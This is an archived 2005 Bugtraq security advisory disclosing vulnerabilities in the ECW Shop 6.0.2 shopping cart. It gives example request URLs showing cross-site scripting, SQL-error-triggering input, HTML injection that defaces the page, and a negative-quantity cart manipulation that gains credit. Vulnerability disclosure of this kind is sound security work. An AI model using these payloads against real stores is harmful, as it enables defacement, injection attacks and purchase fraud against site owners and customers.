| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 15 Aug 2005 23:29:10 +0100 From: "John Cobb" <johnc@...ytes.com> To: <bugtraq@...urityfocus.com> Subject: [NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities Hello All, I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2 Authors Site: http://www.soft4e.com/ ECW Shop is described by its authors as: ECW-Shop - simple for use featured shopping cart with ability to use Excel or Access format for database. +-[Examples:]--------------------------------------------------+ [1]------------------------------------------------------------+ XSS: (This same problem was reported on version 5.5 by David S. Ferreira - http://www.securityfocus.com/bid/9244) http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script > [2]------------------------------------------------------------+ Information Disclosure & Possible SQL Injection: http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min='&max=1 http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=' Error: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/search.php on line 109 [3]------------------------------------------------------------+ HTML Injection: http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3 6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1> http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&ma x=1 [4]------------------------------------------------------------+ Cart/Order Manipulation: You can add negative quanity value items to your cart to gain credit. Example: Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of £6.99 Cart Total: £2.00 +-[Notes:]-----------------------------------------------------+ Vulnerabilities found on: 06/08/2005 Author(s) Informed on: 06/08/2005 Author(s) Response: NONE Author(s) Fix: NONE JohnC@...ytes.com http://www.NoBytes.com
Powered by blists - more mailing lists